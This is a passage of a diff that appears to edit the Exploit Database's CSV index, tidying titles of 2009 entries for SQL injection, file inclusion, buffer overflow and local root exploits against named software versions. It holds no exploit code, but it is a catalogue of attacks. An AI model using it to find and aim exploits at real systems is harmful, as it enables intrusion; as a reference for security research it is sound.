2.7.0 - Remote Blind SQL Injection Exploit",2009-07-27,Qabandi,php,webapps,0 9276,platforms/php/webapps/9276.txt,"IXXO Cart! Standalone and Joomla Component - SQL Injection",2009-07-27,sm0k3,php,webapps,0 9277,platforms/windows/dos/9277.pl,"MP3 Studio 1.0 - (.mpf /.m3u) Local Stack Overflow PoC",2009-07-27,hack4love,windows,dos,0 -9278,platforms/freebsd/remote/9278.txt,"NcFTPd <= 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 -9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload <= 1.3.5 - Remote SQL Injection Exploit",2009-07-27,Dante90,php,webapps,0 -9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload <= 1.3.5 Delete Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0 +9278,platforms/freebsd/remote/9278.txt,"NcFTPd 2.8.5 - Remote Jail Breakout",2009-07-27,kingcope,freebsd,remote,0 +9279,platforms/php/webapps/9279.pl,"PunBB Automatic Image Upload 1.3.5 - SQL Injection Exploit",2009-07-27,Dante90,php,webapps,0 +9280,platforms/php/webapps/9280.pl,"PunBB Automatic Image Upload 1.3.5 Delete Arbitrary File Exploit",2009-07-27,Dante90,php,webapps,0 9281,platforms/php/webapps/9281.txt,"Limny 1.01 - (Auth Bypass) SQL Injection",2009-07-27,SirGod,php,webapps,0 -9282,platforms/php/webapps/9282.txt,"Magician Blog <= 1.0 - (ids) Remote SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 -9283,platforms/php/webapps/9283.txt,"Magician Blog <= 1.0 - (Auth Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 -9284,platforms/php/webapps/9284.txt,"SerWeb <= 2.1.0-dev1 2009-07-02 - Multiple RFI Vulnerabilities",2009-07-27,GoLd_M,php,webapps,0 +9282,platforms/php/webapps/9282.txt,"Magician Blog 1.0 - (ids) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 +9283,platforms/php/webapps/9283.txt,"Magician Blog 1.0 - (Auth Bypass) SQL Injection",2009-07-27,Evil-Cod3r,php,webapps,0 +9284,platforms/php/webapps/9284.txt,"SerWeb 2.1.0-dev1 2009-07-02 - Multiple Remote File Inclusion Vulnerabilities",2009-07-27,GoLd_M,php,webapps,0 9286,platforms/windows/local/9286.pl,"MP3 Studio 1.0 - (.mpf /.m3u) Local Stack Overflow Exploit (SEH)",2009-07-28,corelanc0d3r,windows,local,0 9287,platforms/php/webapps/9287.txt,"PHP Paid 4 Mail Script (paidbanner.php ID) SQL Injection",2009-07-28,"ThE g0bL!N",php,webapps,0 9288,platforms/php/webapps/9288.txt,"phpArcadeScript 4.0 - (linkout.php id) SQL Injection",2009-07-28,MizoZ,php,webapps,0 -9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod <= 2.0.4 - Blind SQL Injection Exploit",2009-07-28,Dante90,php,webapps,0 +9289,platforms/php/webapps/9289.pl,"PunBB Reputation.php Mod 2.0.4 - Blind SQL Injection Exploit",2009-07-28,Dante90,php,webapps,0 9290,platforms/php/webapps/9290.txt,"In-Portal 4.3.1 - Arbitrary Shell Upload",2009-07-28,Mr.tro0oqy,php,webapps,0 9291,platforms/windows/local/9291.pl,"MP3 Studio 1.0 - (.mpf) Local BoF Exploit (SEH)",2009-07-28,Koshi,windows,local,0 9292,platforms/php/webapps/9292.txt,"PaoLink 1.0 - (login_ok) Authentication Bypass",2009-07-28,SirGod,php,webapps,0 @@ -8786,12 +8786,12 @@ id,file,description,date,author,platform,type,port 9312,platforms/php/webapps/9312.txt,"d.net CMS - (LFI/sqli) Multiple Vulnerabilities",2009-07-30,SirGod,php,webapps,0 9313,platforms/php/webapps/9313.txt,"Really Simple CMS 0.3a (pagecontent.php PT) Local File Inclusion",2009-07-30,SirGod,php,webapps,0 9314,platforms/php/webapps/9314.txt,"MUJE CMS 1.0.4.34 - Local File Inclusion Vulnerabilities",2009-07-30,SirGod,php,webapps,0 -9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod <= 2.0.4 - Local File Inclusion Exploit",2009-07-30,Dante90,php,webapps,0 -9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) Remote SQL Injection",2009-07-30,NoGe,php,webapps,0 +9315,platforms/php/webapps/9315.pl,"PunBB Reputation.php Mod 2.0.4 - Local File Inclusion Exploit",2009-07-30,Dante90,php,webapps,0 +9316,platforms/php/webapps/9316.txt,"linkSpheric 0.74b6 - (listID) SQL Injection",2009-07-30,NoGe,php,webapps,0 9317,platforms/windows/dos/9317.c,"Google SketchUp Pro 7.0 - (.skp) Remote Stack Overflow PoC",2009-08-01,LiquidWorm,windows,dos,0 9318,platforms/windows/remote/9318.py,"VLC Media Player 0.8.6f smb:// URI Handling Remote BoF Exploit (univ)",2009-07-31,His0k4,windows,remote,0 9319,platforms/windows/remote/9319.py,"SAP Business One 2005-A License Manager Remote BoF Exploit",2009-08-01,Bruk0ut,windows,remote,30000 -9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) Remote SQL Injection Exploit",2009-08-01,rEcruit,php,webapps,0 +9320,platforms/php/webapps/9320.php,"Arab Portal 2.x - (forum.php qc) SQL Injection Exploit",2009-08-01,rEcruit,php,webapps,0 9321,platforms/windows/local/9321.pl,"Destiny Media Player 1.61 - (.pls) Universal Buffer Overflow Exploit (SEH)",2009-08-01,"ThE g0bL!N",windows,local,0 9322,platforms/php/webapps/9322.txt,"MAXcms 3.11.20b - Multiple Remote File Inclusion Vulnerabilities",2009-08-01,NoGe,php,webapps,0 9323,platforms/multiple/dos/9323.txt,"VirtualBox 2.2 < 3.0.2 r49928 - Local Host Reboot PoC",2009-08-01,"Tadas Vilkeliskis",multiple,dos,0 @@ -8802,7 +8802,7 @@ id,file,description,date,author,platform,type,port 9328,platforms/asp/webapps/9328.txt,"AW BannerAd (Auth Bypass) SQL Injection",2009-08-03,Ro0T-MaFia,asp,webapps,0 9329,platforms/windows/local/9329.pl,"BlazeDVD 5.1 Professional - (.PLF) Local Buffer Overflow Exploit (SEH)",2009-08-03,hack4love,windows,local,0 9330,platforms/windows/remote/9330.py,"Amaya 11.2 W3C Editor/Browser (defer) Remote BoF Exploit (SEH)",2009-08-03,His0k4,windows,remote,0 -9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) RFI",2009-08-03,"cr4wl3r ",php,webapps,0 +9331,platforms/php/webapps/9331.txt,"ProjectButler 1.5.0 - (pda_projects.php offset) Remote File Inclusion",2009-08-03,"cr4wl3r ",php,webapps,0 9332,platforms/php/webapps/9332.txt,"Ajax Short URL Script (Auth Bypass) SQL Injection",2009-08-03,Cicklow,php,webapps,0 9333,platforms/php/webapps/9333.txt,"Netpet CMS 1.9 - (confirm.php language) Local File Inclusion",2009-08-03,SirGod,php,webapps,0 9334,platforms/php/webapps/9334.txt,"QuickDev 4 - (download.php) File Disclosure",2009-08-03,SirGod,php,webapps,0 @@ -8812,21 +8812,21 @@ id,file,description,date,author,platform,type,port 9338,platforms/php/webapps/9338.txt,"Miniweb 2.0 Module Publisher - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9339,platforms/php/webapps/9339.txt,"Miniweb 2.0 Module Survey Pro - (bSQL/XSS) Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 9340,platforms/php/webapps/9340.txt,"x10 media adult script 1.7 - Multiple Vulnerabilities",2009-08-03,Moudi,php,webapps,0 -9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Auth Bypass) Remote SQL Injection",2009-08-03,snakespc,php,webapps,0 +9341,platforms/php/webapps/9341.txt,"Questions Answered 1.3 - (Auth Bypass) SQL Injection",2009-08-03,snakespc,php,webapps,0 9342,platforms/php/webapps/9342.txt,"elvin bts 1.2.2 - (SQL/XSS) Multiple Vulnerabilities",2009-08-03,"599eme Man",php,webapps,0 9343,platforms/windows/local/9343.pl,"MediaCoder 0.6.2.4275 - (.lst) Stack Buffer Overflow Exploit",2009-08-03,SkuLL-HackeR,windows,local,0 9344,platforms/php/webapps/9344.txt,"Multi Website 1.5 - (index php action) SQL Injection",2009-08-03,SarBoT511,php,webapps,0 9345,platforms/windows/dos/9345.pl,"RadASM 2.2.1.5 - (.mnu) Local Format String PoC",2009-08-03,SkuLL-HackeR,windows,dos,0 9346,platforms/windows/local/9346.pl,"Blaze HDTV Player 6.0 - (.PLF) Local Buffer Overflow Exploit (SEH)",2009-08-03,hack4love,windows,local,0 -9347,platforms/php/webapps/9347.txt,"Arab Portal <= 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 +9347,platforms/php/webapps/9347.txt,"Arab Portal 2.2 - (mod.php module) Local File Inclusion",2009-08-03,Qabandi,php,webapps,0 9348,platforms/php/webapps/9348.txt,"Blink Blog System (Auth Bypass) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 9349,platforms/php/webapps/9349.txt,"Discloser 0.0.4-rc2 - (index.php more) SQL Injection",2009-08-03,"Salvatore Fresta",php,webapps,0 -9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - RFI / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0 +9350,platforms/php/webapps/9350.txt,"MAXcms 3.11.20b - Remote File Inclusion / File Disclosure Vulnerabilities",2009-08-03,GoLd_M,php,webapps,0 9351,platforms/php/webapps/9351.txt,"Payment Processor Script (shop.htm cid) SQL Injection",2009-08-03,ZoRLu,php,webapps,0 -9352,platforms/linux/local/9352.c,"Linux Kernel <= 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0 +9352,platforms/linux/local/9352.c,"Linux Kernel 2.6.31-rc5 - sigaltstack 4-Byte Stack Disclosure Exploit",2009-08-04,"Jon Oberheide",linux,local,0 9353,platforms/php/webapps/9353.txt,"MOC Designs PHP News 1.1 - (Auth Bypass) SQL Injection",2009-08-04,SirGod,php,webapps,0 9354,platforms/windows/local/9354.pl,"MediaCoder 0.7.1.4486 - (.lst) Universal Buffer Overflow Exploit (SEH)",2009-08-04,germaya_x,windows,local,0 -9355,platforms/php/webapps/9355.txt,"elgg <= 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 +9355,platforms/php/webapps/9355.txt,"elgg 1.5 - (/_css/js.php) Local File Inclusion",2009-08-04,eLwaux,php,webapps,0 9356,platforms/php/webapps/9356.txt,"shopmaker CMS 2.0 - (bSQL/ LFI) Multiple Vulnerabilities",2009-08-04,PLATEN,php,webapps,0 9357,platforms/cgi/webapps/9357.txt,"Perl$hop e-commerce Script Trust Boundary Input Parameter Injection",2009-08-04,Shadow,cgi,webapps,0 9358,platforms/php/webapps/9358.txt,"In-Portal 4.3.1 - (index.php env) Local File Inclusion",2009-08-04,"Angela Chang",php,webapps,0 @@ -8840,43 +8840,43 @@ id,file,description,date,author,platform,type,port 9366,platforms/windows/local/9366.pl,"jetAudio 7.1.9.4030 plus vx - (.m3u) Local Stack Overflow (SEH)",2009-08-05,corelanc0d3r,windows,local,0 9367,platforms/php/webapps/9367.txt,"tenrok 1.1.0 - (udd/RCE) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9368,platforms/windows/dos/9368.pl,"UltraPlayer Media Player 2.112 - Local Buffer Overflow PoC",2009-08-05,SarBoT511,windows,dos,0 -9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - Remote SQL Injection",2009-08-05,Ins3t,php,webapps,0 +9369,platforms/php/webapps/9369.txt,"Irokez CMS 0.7.1 - SQL Injection",2009-08-05,Ins3t,php,webapps,0 9370,platforms/php/webapps/9370.txt,"AccessoriesMe PHP Affiliate Script 1.4 - (bSQL-XSS) Multiple Vulnerabilities",2009-08-05,Moudi,php,webapps,0 9371,platforms/php/webapps/9371.txt,"opennews 1.0 - (sqli/rce) Multiple Vulnerabilities",2009-08-05,SirGod,php,webapps,0 9372,platforms/php/webapps/9372.txt,"Portel 2008 - (decide.php patron) Blind SQL Injection",2009-08-05,"Chip d3 bi0s",php,webapps,0 9373,platforms/freebsd/dos/9373.c,"FreeBSD 7.2-RELEASE - SCTP Local Kernel Denial of Service Exploit",2009-08-06,"Shaun Colley",freebsd,dos,0 9375,platforms/windows/local/9375.py,"JetAudio 7.1.9.4030 - (.m3u) Universal Stack Overflow Exploit (SEH)",2009-08-06,Dr_IDE,windows,local,0 -9376,platforms/windows/dos/9376.py,"jetAudio <= 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 +9376,platforms/windows/dos/9376.py,"jetAudio 7.5.5 plus vx (M3U/ASX/WAX/WVX) Local Crash PoC",2009-09-10,Dr_IDE,windows,dos,0 9377,platforms/windows/local/9377.pl,"A2 Media Player Pro 2.51 - (.m3u /m3l) Universal Local BoF Exploit (SEH)",2009-08-06,hack4love,windows,local,0 9378,platforms/php/webapps/9378.txt,"PHP Script Forum Hoster - (Topic Delete/XSS) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 9379,platforms/windows/local/9379.pl,"Playlistmaker 1.5 - (.M3U/M3L) Local Stack Overflow Exploit (seh)",2009-08-06,germaya_x,windows,local,0 -9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) Remote SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 +9380,platforms/php/webapps/9380.txt,"TYPO3 CMS 4.0 - (showUid) SQL Injection",2009-08-06,Ro0T-MaFia,php,webapps,0 9381,platforms/windows/dos/9381.py,"Groovy Media Player 1.2.0 - (.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 9382,platforms/windows/dos/9382.txt,"ImTOO MPEG Encoder 3.1.53 - (.cue/.m3u) Local Buffer Overflow PoC",2009-08-06,"opt!x hacker",windows,dos,0 9383,platforms/php/webapps/9383.txt,"LM Starmail 2.0 - (SQL Injection/File Inclusion) Multiple Vulnerabilities",2009-08-06,int_main();,php,webapps,0 -9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple Remote SQL Injection Vulnerabilities",2009-08-07,SwEET-DeViL,php,webapps,0 -9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery <= 1.0 - (Auth Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 +9384,platforms/php/webapps/9384.txt,"Alwasel 1.5 - Multiple SQL Injection Vulnerabilities",2009-08-07,SwEET-DeViL,php,webapps,0 +9385,platforms/php/webapps/9385.txt,"PHotoLa Gallery 1.0 - (Auth Bypass) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9386,platforms/windows/local/9386.txt,"Steam 54/894 - Local Privilege Escalation",2009-08-07,MrDoug,windows,local,0 9387,platforms/php/webapps/9387.txt,"Banner Exchange Script 1.0 - (targetid) Blind SQL Injection",2009-08-07,"599eme Man",php,webapps,0 -9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) Remote SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 -9390,platforms/php/webapps/9390.txt,"Typing Pal <= 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 +9389,platforms/php/webapps/9389.txt,"Logoshows BBS 2.0 - (forumid) SQL Injection",2009-08-07,Ruzgarin_Oglu,php,webapps,0 +9390,platforms/php/webapps/9390.txt,"Typing Pal 1.0 - (idTableProduit) SQL Injection",2009-08-07,Red-D3v1L,php,webapps,0 9392,platforms/windows/dos/9392.pl,"iRehearse - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 9393,platforms/windows/dos/9393.pl,"FoxPlayer 1.1.0 - (.m3u) Local Buffer Overflow PoC",2009-08-07,"opt!x hacker",windows,dos,0 9394,platforms/php/webapps/9394.pl,"Arab Portal 2.2 - (Auth Bypass) Blind SQL Injection Exploit",2009-08-07,"Jafer Al Zidjali",php,webapps,0 -9395,platforms/php/webapps/9395.txt,"PHPCityPortal (Auth Bypass) Remote SQL Injection",2009-08-07,CoBRa_21,php,webapps,0 +9395,platforms/php/webapps/9395.txt,"PHPCityPortal (Auth Bypass) SQL Injection",2009-08-07,CoBRa_21,php,webapps,0 9396,platforms/php/webapps/9396.txt,"Facil Helpdesk - (RFI/LFI/XSS) Multiples Remote Vulnerabilities",2009-08-07,Moudi,php,webapps,0 9397,platforms/php/webapps/9397.txt,"IsolSoft Support Center 2.5 - (RFI/LFI/XSS) Multiples Vulnerabilities",2009-08-07,Moudi,php,webapps,0 9398,platforms/php/webapps/9398.php,"Joomla Component com_pms 2.0.4 - (Ignore-List) SQL Injection Exploit",2009-08-07,M4dhead,php,webapps,0 9399,platforms/php/webapps/9399.txt,"Logoshows BBS 2.0 - (Auth Bypass) SQL Injection",2009-08-07,Dns-Team,php,webapps,0 9400,platforms/php/webapps/9400.txt,"logoshows bbs 2.0 - (DD/ich) Multiple Vulnerabilities",2009-08-07,ZoRLu,php,webapps,0 9401,platforms/windows/dos/9401.py,"Spiceworks 3.6 Accept Parameter Overflow Crash Exploit",2009-08-07,"David Kennedy (ReL1K)",windows,dos,0 -9404,platforms/php/webapps/9404.txt,"SmilieScript <= 1.0 - (Auth Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 +9404,platforms/php/webapps/9404.txt,"SmilieScript 1.0 - (Auth Bypass) SQL Injection",2009-08-10,Mr.tro0oqy,php,webapps,0 9405,platforms/php/webapps/9405.txt,"Papoo CMS 3.7.3 - Authenticated Arbitrary Code Execution",2009-08-10,"RedTeam Pentesting",php,webapps,0 9406,platforms/php/webapps/9406.txt,"Mini-CMS 1.0.1 - (page.php id) SQL Injection",2009-08-10,Ins3t,php,webapps,0 -9407,platforms/php/webapps/9407.txt,"CMS Made Simple <= 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0 +9407,platforms/php/webapps/9407.txt,"CMS Made Simple 1.6.2 - Local File Disclosure",2009-08-10,IHTeam,php,webapps,0 9408,platforms/php/webapps/9408.php,"Joomla Component Kunena Forums (com_kunena) bSQL Injection Exploit",2009-08-10,"ilker Kandemir",php,webapps,0 9409,platforms/windows/local/9409.pl,"MediaCoder 0.7.1.4490 - (.lst/.m3u) Universal BoF Exploit (SEH)",2009-08-10,hack4love,windows,local,0 -9410,platforms/php/webapps/9410.txt,"WordPress <= 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié ",php,webapps,0 +9410,platforms/php/webapps/9410.txt,"WordPress 2.8.3 - Remote Admin Reset Password",2009-08-11,"laurent gaffié ",php,webapps,0 9411,platforms/windows/dos/9411.cpp,"Embedthis Appweb 3.0b.2-4 - Remote Buffer Overflow PoC",2009-08-11,"fl0 fl0w",windows,dos,0 9412,platforms/windows/local/9412.pl,"Easy Music Player 1.0.0.2 - (wav) Universal Local Buffer Exploit (SEH)",2009-08-11,ahwak2000,windows,local,0 9413,platforms/php/webapps/9413.txt,"Joomla Component idoblog 1.1b30 (com_idoblog) - SQL Injection",2009-08-11,kkr,php,webapps,0 @@ -8894,16 +8894,16 @@ id,file,description,date,author,platform,type,port 9427,platforms/windows/dos/9427.py,"VLC Media Player 1.0.0/1.0.1 smb:// URI Handling BoF PoC",2009-08-13,Dr_IDE,windows,dos,0 9428,platforms/windows/local/9428.pl,"pIPL 2.5.0 - (.PLS /.PL) Universal Local Buffer Exploit (SEH)",2009-08-13,hack4love,windows,local,0 9429,platforms/windows/dos/9429.py,"EmbedThis Appweb 3.0B.2-4 - Multiple Remote Buffer Overflow PoC",2009-08-13,Dr_IDE,windows,dos,0 -9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - Remote SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 -9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax <= 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 +9430,platforms/php/webapps/9430.pl,"JBLOG 1.5.1 - SQL Table Backup Exploit",2009-08-13,Ams,php,webapps,0 +9431,platforms/php/webapps/9431.txt,"WordPress Plugin WP-Syntax 0.9.1 - Remote Command Execution",2009-08-27,Raz0r,php,webapps,0 9432,platforms/hardware/remote/9432.txt,"THOMSON ST585 - (user.ini) Arbitrary Download",2009-08-13,"aBo MoHaMeD",hardware,remote,0 9433,platforms/php/webapps/9433.txt,"Gazelle CMS 1.0 - Remote Arbitrary Shell Upload",2009-08-13,RoMaNcYxHaCkEr,php,webapps,0 9434,platforms/php/webapps/9434.txt,"tgs CMS 0.x - (XSS/SQL/fd) Multiple Vulnerabilities",2009-08-13,[]ViZiOn,php,webapps,0 9435,platforms/linux/local/9435.txt,"Linux Kernel 2.x (Redhat) - 'sock_sendpage()' Ring0 Local Root Exploit (1)",2009-08-14,spender,linux,local,0 9436,platforms/linux/local/9436.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (4)",2009-08-14,"Przemyslaw Frasunek",linux,local,0 9437,platforms/php/webapps/9437.txt,"Ignition 1.2 - (comment) Remote Code Injection",2009-08-14,"Khashayar Fereidani",php,webapps,0 -9438,platforms/php/webapps/9438.txt,"PHP Competition System <= 0.84 - (competition) SQL Injection",2009-08-14,Mr.SQL,php,webapps,0 -9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) Remote SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 +9438,platforms/php/webapps/9438.txt,"PHP Competition System 0.84 - (competition) SQL Injection",2009-08-14,Mr.SQL,php,webapps,0 +9440,platforms/php/webapps/9440.txt,"DS CMS 1.0 - (nFileId) SQL Injection",2009-08-14,Mr.tro0oqy,php,webapps,0 9441,platforms/php/webapps/9441.txt,"MyWeight 1.0 - Remote Shell Upload",2009-08-14,Mr.tro0oqy,php,webapps,0 9442,platforms/linux/dos/9442.c,"Linux Kernel < 2.6.30.5 cfg80211 - Remote Denial of Service Exploit",2009-08-18,"Jon Oberheide",linux,dos,0 9443,platforms/windows/remote/9443.txt,"Adobe JRun 4 - (logfile) Directory Traversal (Auth)",2009-08-18,DSecRG,windows,remote,0 @@ -8914,7 +8914,7 @@ id,file,description,date,author,platform,type,port 9448,platforms/php/webapps/9448.py,"SPIP < 2.0.9 - Arbitrary Copy All Passwords to XML File Remote Exploit",2009-08-18,Kernel_Panik,php,webapps,0 9449,platforms/windows/dos/9449.txt,"TheGreenBow VPN Client tgbvpn.sys Local DoS Exploit",2009-08-18,Evilcry,windows,dos,0 9450,platforms/php/webapps/9450.txt,"Vtiger CRM 5.0.4 - (RCE/CSRF/LFI/XSS) Multiple Vulnerabilities",2009-08-18,USH,php,webapps,0 -9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) Remote SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 +9451,platforms/php/webapps/9451.txt,"Dreampics Builder (exhibition_id) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9452,platforms/php/webapps/9452.pl,"Arcadem Pro 2.8 - (article) Blind SQL Injection Exploit",2009-08-18,Mr.SQL,php,webapps,0 9453,platforms/php/webapps/9453.txt,"Videos Broadcast Yourself 2 - (UploadID) SQL Injection",2009-08-18,Mr.SQL,php,webapps,0 9454,platforms/multiple/dos/9454.txt,"Safari 4.0.2 - (WebKit Parsing of Floating Point Numbers) BoF PoC",2009-08-18,"Leon Juranic",multiple,dos,0 @@ -8923,11 +8923,11 @@ id,file,description,date,author,platform,type,port 9457,platforms/windows/dos/9457.pl,"broid 1.0 Beta 3a - (.mp3) Local Buffer Overflow PoC",2009-08-18,hack4love,windows,dos,0 9458,platforms/windows/local/9458.pl,"Xenorate Media Player 2.6.0.0 - (.xpl) Universal Local Buffer Exploit (SEH)",2009-08-18,hack4love,windows,local,0 9459,platforms/php/webapps/9459.txt,"2WIRE Gateway - Auth Bypass & Password Reset Vulnerabilities (2)",2009-08-18,bugz,php,webapps,0 -9460,platforms/php/webapps/9460.txt,"autonomous lan party <= 0.98.3 - Remote File Inclusion",2009-08-18,"cr4wl3r ",php,webapps,0 -9461,platforms/php/webapps/9461.txt,"E CMS <= 1.0 - (index.php s) Remote SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 -9462,platforms/php/webapps/9462.txt,"Infinity <= 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,php,webapps,0 +9460,platforms/php/webapps/9460.txt,"autonomous lan party 0.98.3 - Remote File Inclusion",2009-08-18,"cr4wl3r ",php,webapps,0 +9461,platforms/php/webapps/9461.txt,"E CMS 1.0 - (index.php s) SQL Injection",2009-08-18,Red-D3v1L,php,webapps,0 +9462,platforms/php/webapps/9462.txt,"Infinity 2.x.x - options[style_dir] Local File Disclosure",2009-08-18,SwEET-DeViL,php,webapps,0 9463,platforms/php/webapps/9463.php,"Joomla Component MisterEstate Blind SQL Injection Exploit",2009-08-18,jdc,php,webapps,0 -9464,platforms/php/webapps/9464.txt,"Fotoshow PRO (category) Remote SQL Injection",2009-08-18,darkmasking,php,webapps,0 +9464,platforms/php/webapps/9464.txt,"Fotoshow PRO (category) SQL Injection",2009-08-18,darkmasking,php,webapps,0 9465,platforms/php/webapps/9465.txt,"phpfreeBB 1.0 - Remote BLIND SQL Injection",2009-08-18,Moudi,php,webapps,0 9466,platforms/windows/local/9466.pl,"Playlistmaker 1.51 - (.m3u) Local Buffer Overflow Exploit (SEH)",2009-08-18,blake,windows,local,0 9467,platforms/windows/dos/9467.pl,"KOL Player 1.0 - (.mp3) Local Buffer Overflow PoC",2009-08-18,Evil.Man,windows,dos,0 @@ -8937,21 +8937,21 @@ id,file,description,date,author,platform,type,port 9471,platforms/php/webapps/9471.txt,"CBAuthority - ClickBank Affiliate Management SQL Injection",2009-08-18,"Angela Chang",php,webapps,0 9472,platforms/php/webapps/9472.txt,"Best Dating Script Arbitrary Shell Upload",2009-08-18,jetli007,php,webapps,0 9473,platforms/hardware/remote/9473.txt,"ZTE ZXDSL 831 II Modem Arbitrary Configuration Access",2009-08-18,SuNHouSe2,hardware,remote,0 -9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - Remote SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0 +9474,platforms/php/webapps/9474.rb,"Traidnt UP 2.0 - SQL Injection Exploit",2009-08-18,"Jafer Al Zidjali",php,webapps,0 9475,platforms/php/webapps/9475.txt,"asaher pro 1.0.4 - Remote Database Backup",2009-08-18,alnjm33,php,webapps,0 9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - (.m3u) Universal Buffer Overflow Exploit",2009-08-18,mr_me,windows,local,0 9477,platforms/android/local/9477.txt,"Linux Kernel 2.x - 'sock_sendpage()' Local Root Exploit (Android)",2009-08-18,Zinx,android,local,0 9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service Exploit",2007-06-21,Prili,windows,dos,80 9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4~11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' ring0 Root Exploit (5)",2009-08-24,"INetCop Security",linux,local,0 9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow PoC",2007-05-09,rgod,windows,dos,0 -9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 +9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Auth Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0 9483,platforms/windows/local/9483.pl,"Photodex ProShow Gold 4 - (.psh) Universal BoF Exploit XP SP3 (SEH)",2009-08-24,corelanc0d3r,windows,local,0 -9484,platforms/php/webapps/9484.txt,"PHP Dir Submit (aid) Remote SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 +9484,platforms/php/webapps/9484.txt,"PHP Dir Submit (aid) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0 9485,platforms/php/webapps/9485.txt,"Cuteflow 2.10.3 edituser.php Security Bypass",2009-08-24,"Hever Costa Rocha",php,webapps,0 9486,platforms/windows/local/9486.pl,"KSP 2006 FINAL (.M3U) Universal Local Buffer Exploit (SEH)",2009-08-24,hack4love,windows,local,0 9487,platforms/windows/dos/9487.pl,"Faslo Player 7.0 - (.m3u) Local Buffer Overflow PoC",2009-08-24,hack4love,windows,dos,0 -9488,platforms/freebsd/local/9488.c,"FreeBSD <= 6.1 - kqueue() NULL pointer Dereference Local Root Exploit",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 +9488,platforms/freebsd/local/9488.c,"FreeBSD 6.1 - kqueue() NULL pointer Dereference Local Root Exploit",2009-08-24,"Przemyslaw Frasunek",freebsd,local,0 9489,platforms/multiple/local/9489.txt,"Multiple BSD Operating Systems setusercontext() Vulnerabilities",2009-08-24,kingcope,multiple,local,0 9490,platforms/php/webapps/9490.txt,"Lanai Core 0.6 - Remote File Disclosure / Info Disclosure Vulnerabilities",2009-08-24,"Khashayar Fereidani",php,webapps,0 9491,platforms/php/webapps/9491.txt,"Dow Group (new.php) SQL Injection",2009-11-16,ProF.Code,php,webapps,0 @@ -8964,19 +8964,19 @@ id,file,description,date,author,platform,type,port 9498,platforms/hardware/remote/9498.txt,"Netgear WNR2000 FW 1.2.0.8 Information Disclsoure Vulnerabilities",2009-08-24,"Jean 